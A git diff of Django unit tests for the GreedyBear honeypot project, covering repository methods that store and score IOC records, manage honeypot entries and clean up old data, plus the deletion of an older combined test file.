+ self.assertIn("TestActivePot1", names)
+ self.assertIn("TestActivePot2", names)
+ self.assertNotIn("TestInactivePot", names)
+
+ def test_get_active_honeypots_returns_empty_if_none_active(self):
+ GeneralHoneypot.objects.update(active=False)
+
+ result = self.repo.get_active_honeypots()
+ self.assertEqual(len(result), 0)
+
+ GeneralHoneypot.objects.update(active=True)
+
+ def test_get_hp_by_name_returns_existing(self):
+ GeneralHoneypot.objects.create(name="TestPot", active=True)
+ result = self.repo.get_hp_by_name("TestPot")
+ self.assertIsNotNone(result)
+ self.assertEqual(result.name, "TestPot")
+
+ def test_get_hp_by_name_returns_none_for_missing(self):
+ result = self.repo.get_hp_by_name("nonexistent")
+ self.assertIsNone(result)
+
+ def test_is_empty_returns_false_when_has_iocs(self):
+ result = self.repo.is_empty()
+ self.assertFalse(result)
+
+ def test_is_enabled_returns_true_for_cowrie(self):
+ result = self.repo.is_enabled("Cowrie")
+ self.assertTrue(result)
+
+ def test_is_enabled_returns_true_for_log4pot(self):
+ result = self.repo.is_enabled("Log4pot")
+ self.assertTrue(result)
+
+ def test_is_enabled_returns_true_for_active_honeypot(self):
+ result = self.repo.is_enabled("Heralding")
+ self.assertTrue(result)
+
+ def test_is_enabled_returns_false_for_inactive_honeypot(self):
+ result = self.repo.is_enabled("Ddospot")
+ self.assertFalse(result)
+
+ def test_add_honeypot_to_ioc_adds_new_honeypot(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
+ result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
+ self.assertIn(honeypot, result.general_honeypot.all())
+
+ def test_add_honeypot_to_ioc_idempotent(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
+ ioc.general_honeypot.add(honeypot)
+ initial_count = ioc.general_honeypot.count()
+ result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
+ self.assertEqual(result.general_honeypot.count(), initial_count)
+ self.assertEqual(ioc.general_honeypot.count(), 1)
+
+ def test_add_honeypot_to_ioc_multiple_honeypots(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+ hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+ self.repo.add_honeypot_to_ioc("Pot1", ioc)
+ self.repo.add_honeypot_to_ioc("Pot2", ioc)
+ self.assertEqual(ioc.general_honeypot.count(), 2)
+ self.assertIn(hp1, ioc.general_honeypot.all())
+ self.assertIn(hp2, ioc.general_honeypot.all())
+
+ def test_existing_honeypots(self):
+ expected_honeypots = ["Cowrie", "Log4pot", "Heralding", "Ciscoasa", "Ddospot"]
+ for hp_name in expected_honeypots:
+ self.assertIn(self.repo._normalize_name(hp_name), self.repo._honeypot_cache)
+
+ def test_is_ready_for_extraction_creates_and_enables(self):
+ result = self.repo.is_ready_for_extraction("FooPot")
+ self.assertTrue(result)
+ self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
+
+ def test_is_ready_for_extraction_case_insensitive(self):
+ GeneralHoneypot.objects.create(name="Cowrie", active=True)
+ result = self.repo.is_ready_for_extraction("cowrie")
+ self.assertTrue(result)
+ self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
+
+ def test_get_hp_by_name_insensitive(self):
+ GeneralHoneypot.objects.create(name="Cowrie", active=True)
+ result = self.repo.get_hp_by_name("cowrie")
+ self.assertIsNotNone(result)
+
+ def test_disabled_honeypot_case_insensitive(self):
+ GeneralHoneypot.objects.create(name="Testpot69", active=False)
+
+ # reiniting repo after DB change to refresh the cache
+ repo = IocRepository()
+ result = repo.is_ready_for_extraction("testpot69")
+ self.assertFalse(result)
+
+ def test_special_and_normal_honeypots(self):
+ GeneralHoneypot.objects.create(name="NormalPot", active=False)
+
+ repo = IocRepository()
+
+ self.assertTrue(repo.is_ready_for_extraction("cowrie"))
+ self.assertTrue(repo.is_ready_for_extraction("Log4Pot"))
+ self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
+ self.assertFalse(repo.is_ready_for_extraction("normalpot"))
+
+ def test_create_honeypot_case_insensitive_uniqueness(self):
+ initial_count = GeneralHoneypot.objects.count()
+ GeneralHoneypot.objects.create(name="TestPot123", active=True)
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+ with self.assertRaises(IntegrityError):
+ with transaction.atomic():
+ GeneralHoneypot.objects.create(name="testpot123", active=True)
+
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+ self.assertEqual(GeneralHoneypot.objects.get(name__iexact="testpot123").name, "TestPot123")
+
+ def test_create_honeypot_integrity_error_handling(self):
+ initial_count = GeneralHoneypot.objects.count()
+ GeneralHoneypot.objects.create(name="Log4PotTest123", active=True)
+
+ try:
+ with transaction.atomic():
+ GeneralHoneypot.objects.create(name="log4pottest123", active=True)
+ except IntegrityError:
+ hp = GeneralHoneypot.objects.filter(name__iexact="log4pottest123").first()
+
+ self.assertEqual(hp.name, "Log4PotTest123")
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+ def test_create_new_honeypot_creates_and_updates_cache(self):
+ self.repo._honeypot_cache.clear()
+ hp = self.repo.create_honeypot("UniqueNewPot123")
+ self.assertEqual(hp.name, "UniqueNewPot123")
+ self.assertIn("uniquenewpot123", self.repo._honeypot_cache)
+ self.assertTrue(hp.active)
+
+ db_hp = GeneralHoneypot.objects.get(name="UniqueNewPot123")
+ self.assertEqual(db_hp.name, "UniqueNewPot123")
+ self.assertTrue(db_hp.active)
+
+ def test_honeypot_unique_constraint_case_insensitive(self):
+ initial_count = GeneralHoneypot.objects.count()
+ hp1 = self.repo.create_honeypot("TestPot456")
+ self.assertIsNotNone(hp1)
+
+ with self.assertRaises(IntegrityError):
+ with transaction.atomic():
+ GeneralHoneypot.objects.create(name="testpot456", active=True)
+
+ self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="testpot456").count(), 1)
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+ def test_get_scanners_for_scoring_returns_scanners(self):
+ # Create scanners
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
+ IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
+
+ result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
+
+ names = [ioc.name for ioc in result]
+ self.assertIn("1.2.3.4", names)
+ self.assertIn("5.6.7.8", names)
+
+ def test_get_scanners_for_scoring_excludes_non_scanners(self):
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
+
+ result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
+
+ names = [ioc.name for ioc in result]
+ self.assertNotIn("1.2.3.4", names)
+
+ def test_get_scanners_for_scoring_only_loads_specified_fields(self):
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ # Check that our created IOC is in the results
+ names = [ioc.name for ioc in result]
+ self.assertIn("1.2.3.4", names)
+ # Verify name field is accessible (field was loaded)
+ test_ioc = next(ioc for ioc in result if ioc.name == "1.2.3.4")
+ self.assertEqual(test_ioc.name, "1.2.3.4")
+
+ def test_get_scanners_by_pks_returns_correct_iocs(self):
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip")
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip")
+ IOC.objects.create(name="9.10.11.12", type="ip") # Should not be returned
+
+ result = list(self.repo.get_scanners_by_pks({ioc1.pk, ioc2.pk}))
+
+ self.assertEqual(len(result), 2)
+ values = [r["value"] for r in result]
+ self.assertIn("1.2.3.4", values)
+ self.assertIn("5.6.7.8", values)
+ self.assertNotIn("9.10.11.12", values)
+
+ def test_get_scanners_by_pks_includes_honeypot_annotation(self):
+ hp = GeneralHoneypot.objects.create(name="TestPot", active=True)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ ioc.general_honeypot.add(hp)
+
+ result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+ self.assertEqual(len(result), 1)
+ self.assertIn("honeypots", result[0])
+
+ def test_get_recent_scanners_returns_recent_only(self):
+ recent_date = datetime.now() - timedelta(days=5)
+ old_date = datetime.now() - timedelta(days=40)
+
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+ IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
+
+ values = [r["value"] for r in result]
+ self.assertIn("1.2.3.4", values)
+ self.assertNotIn("5.6.7.8", values)
+
+ def test_get_recent_scanners_excludes_non_scanners(self):
+ recent_date = datetime.now() - timedelta(days=5)
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff))
+
+ values = [r["value"] for r in result]
+ self.assertNotIn("1.2.3.4", values)
+
+ def test_bulk_update_scores_updates_multiple_iocs(self):
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+ ioc1.recurrence_probability = 0.75
+ ioc2.recurrence_probability = 0.85
+
+ result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"])
+
+ self.assertEqual(result, 2)
+ updated1 = IOC.objects.get(name="1.2.3.4")
+ updated2 = IOC.objects.get(name="5.6.7.8")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.85)
+
+ def test_bulk_update_scores_returns_zero_for_empty_list(self):
+ result = self.repo.bulk_update_scores([], ["recurrence_probability"])
+ self.assertEqual(result, 0)
+
+ def test_bulk_update_scores_updates_multiple_fields(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0, expected_interactions=0.0)
+
+ ioc.recurrence_probability = 0.75
+ ioc.expected_interactions = 10.5
+
+ result = self.repo.bulk_update_scores([ioc], ["recurrence_probability", "expected_interactions"])
+
+ self.assertEqual(result, 1)
+ updated = IOC.objects.get(name="1.2.3.4")
+ self.assertEqual(updated.recurrence_probability, 0.75)
+ self.assertEqual(updated.expected_interactions, 10.5)
+
+ # Edge case tests
+ def test_get_scanners_for_scoring_returns_empty_when_no_scanners(self):
+ # Delete all existing scanners
+ IOC.objects.filter(scanner=True).delete()
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ self.assertEqual(len(result), 0)
+
+ def test_get_scanners_for_scoring_excludes_inactive_honeypots(self):
+ hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+ ioc.general_honeypot.add(hp)
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ names = [ioc.name for ioc in result]
+ self.assertNotIn("1.2.3.4", names)
+
+ def test_get_scanners_for_scoring_with_multiple_honeypots(self):
+ hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+ hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+ ioc.general_honeypot.add(hp1, hp2)
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ names = [ioc.name for ioc in result]
+ # Should appear only once despite multiple honeypots (distinct)
+ self.assertEqual(names.count("1.2.3.4"), 1)
+
+ def test_get_scanners_by_pks_with_empty_set(self):
+ result = list(self.repo.get_scanners_by_pks(set()))
+
+ self.assertEqual(len(result), 0)
+
+ def test_get_scanners_by_pks_with_nonexistent_pks(self):
+ result = list(self.repo.get_scanners_by_pks({99999, 99998}))
+
+ self.assertEqual(len(result), 0)
+
+ def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+ result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+ self.assertEqual(len(result), 1)
+ self.assertIn("honeypots", result[0])
+
+ def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
+ old_date = datetime.now() - timedelta(days=40)
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff))
+
+ values = [r["value"] for r in result]
+ self.assertNotIn("1.2.3.4", values)
+
+ def test_get_recent_scanners_with_inactive_honeypot(self):
+ hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+ recent_date = datetime.now() - timedelta(days=5)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+ ioc.general_honeypot.add(hp)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff))
+
+ values = [r["value"] for r in result]
+ self.assertNotIn("1.2.3.4", values)
+
+ def test_bulk_update_scores_with_custom_batch_size(self):
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+ ioc1.recurrence_probability = 0.75
+ ioc2.recurrence_probability = 0.85
+
+ result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"], batch_size=1)
+
+ self.assertEqual(result, 2)
+ updated1 = IOC.objects.get(name="1.2.3.4")
+ updated2 = IOC.objects.get(name="5.6.7.8")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.85)
+
+
+class TestScoringIntegration(CustomTestCase):
+ """Integration tests for scoring jobs using IocRepository."""
+
+ def setUp(self):
+ self.repo = IocRepository()
+
+ def test_update_scores_with_repository(self):
+ """Test UpdateScores class works with injected repository."""
+ import pandas as pd
+
+ from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+ # Create test data
+ IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
+ IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
+
+ # Create score dataframe
+ df = pd.DataFrame(
+ {
+ "value": ["10.1.2.3", "10.5.6.7"],
+ "recurrence_probability": [0.75, 0.85],
+ "expected_interactions": [10.0, 15.0],
+ }
+ )
+
+ # Inject repository and run update
+ job = UpdateScores(ioc_repo=self.repo)
+ result = job.update_db(df)
+
+ # Verify our IOCs were updated (may be more due to test fixtures)
+ self.assertGreaterEqual(result, 2)
+ updated1 = IOC.objects.get(name="10.1.2.3")
+ updated2 = IOC.objects.get(name="10.5.6.7")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.85)
+
+ def test_update_scores_resets_missing_iocs(self):
+ """Test UpdateScores resets scores for IOCs not in the dataframe."""
+ import pandas as pd
+
+ from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+ # Create test data - one IOC will be missing from df
+ IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
+ IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
+
+ # DataFrame only has one IOC
+ df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+ job = UpdateScores(ioc_repo=self.repo)
+ job.update_db(df)
+
+ # First should be updated, second should be reset to 0
+ updated1 = IOC.objects.get(name="10.2.3.4")
+ updated2 = IOC.objects.get(name="10.6.7.8")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.0) # Reset
+
+ def test_get_current_data_with_repository(self):
+ """Test get_current_data utility function works with repository."""
+ from greedybear.cronjobs.scoring.utils import get_current_data
+
+ recent_date = datetime.now() - timedelta(days=5)
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+
+ result = get_current_data(days_lookback=30, ioc_repo=self.repo)
+
+ self.assertIsInstance(result, list)
+ self.assertGreater(len(result), 0)
+ values = [r["value"] for r in result]
+ self.assertIn("1.2.3.4", values)
+
+ def test_get_data_by_pks_with_repository(self):
+ """Test get_data_by_pks utility function works with repository."""
+ from greedybear.cronjobs.scoring.utils import get_data_by_pks
+
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+ result = get_data_by_pks({ioc.pk}, ioc_repo=self.repo)
+
+ self.assertIsInstance(result, list)
+ self.assertEqual(len(result), 1)
+ self.assertEqual(result[0]["value"], "1.2.3.4")
+
+ def test_update_scores_with_mock_repository(self):
+ """Test UpdateScores can be fully mocked for unit testing."""
+ import pandas as pd
+
+ from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+ # Create mock repository
+ mock_repo = Mock()
+ mock_ioc = Mock()
+ mock_ioc.name = "1.2.3.4"
+ mock_ioc.recurrence_probability = 0.0
+ mock_repo.get_scanners_for_scoring.return_value = [mock_ioc]
+ mock_repo.bulk_update_scores.return_value = 1
+
+ # Create score dataframe
+ df = pd.DataFrame({"value": ["1.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+ # Inject mock and verify it's used
+ job = UpdateScores(ioc_repo=mock_repo)
+ result = job.update_db(df)
+
+ # Verify repository methods were called
+ mock_repo.get_scanners_for_scoring.assert_called_once()
+ mock_repo.bulk_update_scores.assert_called_once()
+ self.assertEqual(result, 1)
+
+
+class TestIocRepositoryCleanup(CustomTestCase):
+ """Tests for cleanup-related methods in IocRepository."""
+
+ def setUp(self):
+ self.repo = IocRepository()
+
+ def test_delete_old_iocs_deletes_old_records(self):
+ old_date = datetime.now() - timedelta(days=40)
+ recent_date = datetime.now() - timedelta(days=5)
+
+ IOC.objects.create(name="1.2.3.4", type="ip", last_seen=old_date)
+ IOC.objects.create(name="5.6.7.8", type="ip", last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_old_iocs(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(IOC.objects.filter(name="1.2.3.4").exists())
+ self.assertTrue(IOC.objects.filter(name="5.6.7.8").exists())
+
+ def test_delete_old_iocs_returns_zero_when_none_old(self):
+ recent_date = datetime.now() - timedelta(days=5)
+ IOC.objects.create(name="1.2.3.4", type="ip", last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_old_iocs(cutoff)
+
+ self.assertEqual(deleted_count, 0)
+
+ def test_update_ioc_reputation_updates_existing(self):
+ IOC.objects.create(name="1.2.3.4", type="ip", ip_reputation="")
+
+ result = self.repo.update_ioc_reputation("1.2.3.4", "mass scanner")
+
+ self.assertTrue(result)
+ updated = IOC.objects.get(name="1.2.3.4")
+ self.assertEqual(updated.ip_reputation, "mass scanner")
+
+ def test_update_ioc_reputation_returns_false_for_missing(self):
+ result = self.repo.update_ioc_reputation("9.9.9.9", "mass scanner")
+ self.assertFalse(result)
diff --git a/tests/test_mass_scanner_repository.py b/tests/test_mass_scanner_repository.py
new file mode 100644
index 00000000..22aeec7f
--- /dev/null
+++ b/tests/test_mass_scanner_repository.py
@@ -0,0 +1,37 @@
+from greedybear.cronjobs.repositories import MassScannerRepository
+from greedybear.models import MassScanner
+
+from . import CustomTestCase
+
+
+class TestMassScannerRepository(CustomTestCase):
+ """Tests for MassScannerRepository."""
+
+ def setUp(self):
+ self.repo = MassScannerRepository()
+
+ def test_get_or_create_creates_new_entry(self):
+ scanner, created = self.repo.get_or_create("1.2.3.4", "test scanner")
+
+ self.assertTrue(created)
+ self.assertEqual(scanner.ip_address, "1.2.3.4")
+ self.assertEqual(scanner.reason, "test scanner")
+ self.assertTrue(MassScanner.objects.filter(ip_address="1.2.3.4").exists())
+
+ def test_get_or_create_returns_existing(self):
+ MassScanner.objects.create(ip_address="5.6.7.8", reason="existing")
+
+ scanner, created = self.repo.get_or_create("5.6.7.8", "new reason")
+
+ self.assertFalse(created)
+ self.assertEqual(scanner.ip_address, "5.6.7.8")
+ # Should keep original reason, not update it
+ self.assertEqual(scanner.reason, "existing")
+ self.assertEqual(MassScanner.objects.filter(ip_address="5.6.7.8").count(), 1)
+
+ def test_get_or_create_without_reason(self):
+ scanner, created = self.repo.get_or_create("7.7.7.7")
+
+ self.assertTrue(created)
+ self.assertEqual(scanner.ip_address, "7.7.7.7")
+ self.assertEqual(scanner.reason, "")
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
deleted file mode 100644
index ff2647d0..00000000
--- a/tests/test_repositories.py
+++ /dev/null
@@ -1,1111 +0,0 @@
-from datetime import datetime
-from unittest.mock import Mock, patch
-
-from django.db import IntegrityError, transaction
-
-from greedybear.cronjobs.repositories import (
- CowrieSessionRepository,
- ElasticRepository,
- FireHolRepository,
- IocRepository,
- MassScannerRepository,
- SensorRepository,
- get_time_window,
-)
-from greedybear.models import (
- IOC,
- CommandSequence,
- CowrieSession,
- FireHolList,
- GeneralHoneypot,
- MassScanner,
- Sensor,
-)
-
-from . import CustomTestCase
-
-
-class TestIocRepository(CustomTestCase):
- def setUp(self):
- self.repo = IocRepository()
-
- def test_get_ioc_by_name_returns_existing(self):
- result = self.repo.get_ioc_by_name("140.246.171.141")
- self.assertIsNotNone(result)
- self.assertEqual(result.name, "140.246.171.141")
-
- def test_get_ioc_by_name_returns_none_for_missing(self):
- result = self.repo.get_ioc_by_name("8.8.8.8")
- self.assertIsNone(result)
-
- def test_save_creates_new_ioc(self):
- ioc = IOC(name="1.2.3.4", type="ip")
- result = self.repo.save(ioc)
- self.assertIsNotNone(result.pk)
- self.assertTrue(IOC.objects.filter(name="1.2.3.4").exists())
-
- def test_save_updates_existing_ioc(self):
- ioc = self.repo.get_ioc_by_name("140.246.171.141")
- original_attack_count = ioc.attack_count
-
- ioc.attack_count = 10
- result = self.repo.save(ioc)
- self.assertEqual(result.attack_count, 10)
- self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, 10)
-
- ioc.attack_count = original_attack_count
- result = self.repo.save(ioc)
- self.assertEqual(result.attack_count, original_attack_count)
- self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, original_attack_count)
-
- def test_create_honeypot(self):
- self.repo.create_honeypot("NewHoneypot")
- self.assertTrue(GeneralHoneypot.objects.filter(name="NewHoneypot").exists())
- hp = GeneralHoneypot.objects.get(name="NewHoneypot")
- self.assertTrue(hp.active)
-
- def test_get_active_honeypots_returns_only_active(self):
- GeneralHoneypot.objects.create(name="TestActivePot1", active=True)
- GeneralHoneypot.objects.create(name="TestActivePot2", active=True)
- GeneralHoneypot.objects.create(name="TestInactivePot", active=False)
-
- result = self.repo.get_active_honeypots()
- names = [hp.name for hp in result]
-
- self.assertIn("TestActivePot1", names)
- self.assertIn("TestActivePot2", names)
- self.assertNotIn("TestInactivePot", names)
-
- def test_get_active_honeypots_returns_empty_if_none_active(self):
- GeneralHoneypot.objects.update(active=False)
-
- result = self.repo.get_active_honeypots()
- self.assertEqual(len(result), 0)
-
- GeneralHoneypot.objects.update(active=True)
-
- def test_get_hp_by_name_returns_existing(self):
- GeneralHoneypot.objects.create(name="TestPot", active=True)
- result = self.repo.get_hp_by_name("TestPot")
- self.assertIsNotNone(result)
- self.assertEqual(result.name, "TestPot")
-
- def test_get_hp_by_name_returns_none_for_missing(self):
- result = self.repo.get_hp_by_name("nonexistent")
- self.assertIsNone(result)
-
- def test_is_empty_returns_false_when_has_iocs(self):
- result = self.repo.is_empty()
- self.assertFalse(result)
-
- def test_is_enabled_returns_true_for_cowrie(self):
- result = self.repo.is_enabled("Cowrie")
- self.assertTrue(result)
-
- def test_is_enabled_returns_true_for_log4pot(self):
- result = self.repo.is_enabled("Log4pot")
- self.assertTrue(result)
-
- def test_is_enabled_returns_true_for_active_honeypot(self):
- result = self.repo.is_enabled("Heralding")
- self.assertTrue(result)
-
- def test_is_enabled_returns_false_for_inactive_honeypot(self):
- result = self.repo.is_enabled("Ddospot")
- self.assertFalse(result)
-
- def test_add_honeypot_to_ioc_adds_new_honeypot(self):
- ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
- result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
- self.assertIn(honeypot, result.general_honeypot.all())
-
- def test_add_honeypot_to_ioc_idempotent(self):
- ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
- ioc.general_honeypot.add(honeypot)
- initial_count = ioc.general_honeypot.count()
- result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
- self.assertEqual(result.general_honeypot.count(), initial_count)
- self.assertEqual(ioc.general_honeypot.count(), 1)
-
- def test_add_honeypot_to_ioc_multiple_honeypots(self):
- ioc = IOC.objects.create(name="1.2.3.4", type="ip")
- hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
- hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
- self.repo.add_honeypot_to_ioc("Pot1", ioc)
- self.repo.add_honeypot_to_ioc("Pot2", ioc)
- self.assertEqual(ioc.general_honeypot.count(), 2)
- self.assertIn(hp1, ioc.general_honeypot.all())
- self.assertIn(hp2, ioc.general_honeypot.all())
-
- def test_existing_honeypots(self):
- expected_honeypots = ["Cowrie", "Log4pot", "Heralding", "Ciscoasa", "Ddospot"]
- for hp_name in expected_honeypots:
- self.assertIn(self.repo._normalize_name(hp_name), self.repo._honeypot_cache)
-
- def test_is_ready_for_extraction_creates_and_enables(self):
- result = self.repo.is_ready_for_extraction("FooPot")
- self.assertTrue(result)
- self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
-
- def test_is_ready_for_extraction_case_insensitive(self):
- GeneralHoneypot.objects.create(name="Cowrie", active=True)
- result = self.repo.is_ready_for_extraction("cowrie")
- self.assertTrue(result)
- self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
-
- def test_get_hp_by_name_insensitive(self):
- GeneralHoneypot.objects.create(name="Cowrie", active=True)
- result = self.repo.get_hp_by_name("cowrie")
- self.assertIsNotNone(result)
-
- def test_disabled_honeypot_case_insensitive(self):
- GeneralHoneypot.objects.create(name="Testpot69", active=False)
-
- # reiniting repo after DB change to refresh the cache
- repo = IocRepository()
- result = repo.is_ready_for_extraction("testpot69")
- self.assertFalse(result)
-
- def test_special_and_normal_honeypots(self):
- GeneralHoneypot.objects.create(name="NormalPot", active=False)
-
- repo = IocRepository()
-
- self.assertTrue(repo.is_ready_for_extraction("cowrie"))
- self.assertTrue(repo.is_ready_for_extraction("Log4Pot"))
- self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
- self.assertFalse(repo.is_ready_for_extraction("normalpot"))
-
- def test_create_honeypot_case_insensitive_uniqueness(self):
- initial_count = GeneralHoneypot.objects.count()
- GeneralHoneypot.objects.create(name="TestPot123", active=True)
- self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-
- with self.assertRaises(IntegrityError):
- with transaction.atomic():
- GeneralHoneypot.objects.create(name="testpot123", active=True)
-
- self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
- self.assertEqual(GeneralHoneypot.objects.get(name__iexact="testpot123").name, "TestPot123")
-
- def test_create_honeypot_integrity_error_handling(self):
- initial_count = GeneralHoneypot.objects.count()
- GeneralHoneypot.objects.create(name="Log4PotTest123", active=True)
-
- try:
- with transaction.atomic():
- GeneralHoneypot.objects.create(name="log4pottest123", active=True)
- except IntegrityError:
- hp = GeneralHoneypot.objects.filter(name__iexact="log4pottest123").first()
-
- self.assertEqual(hp.name, "Log4PotTest123")
- self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-
- def test_create_new_honeypot_creates_and_updates_cache(self):
- self.repo._honeypot_cache.clear()
- hp = self.repo.create_honeypot("UniqueNewPot123")
- self.assertEqual(hp.name, "UniqueNewPot123")
- self.assertTrue("uniquenewpot123" in self.repo._honeypot_cache)
- self.assertTrue(hp.active)
-
- db_hp = GeneralHoneypot.objects.get(name="UniqueNewPot123")
- self.assertEqual(db_hp.name, "UniqueNewPot123")
- self.assertTrue(db_hp.active)
-
- def test_honeypot_unique_constraint_case_insensitive(self):
- initial_count = GeneralHoneypot.objects.count()
- hp1 = self.repo.create_honeypot("TestPot456")
- self.assertIsNotNone(hp1)
-
- with self.assertRaises(IntegrityError):
- with transaction.atomic():
- GeneralHoneypot.objects.create(name="testpot456", active=True)
-
- self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="testpot456").count(), 1)
- self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-
- def test_get_scanners_for_scoring_returns_scanners(self):
- # Create scanners
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
- IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
-
- result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
-
- names = [ioc.name for ioc in result]
- self.assertIn("1.2.3.4", names)
- self.assertIn("5.6.7.8", names)
-
- def test_get_scanners_for_scoring_excludes_non_scanners(self):
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
-
- result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
-
- names = [ioc.name for ioc in result]
- self.assertNotIn("1.2.3.4", names)
-
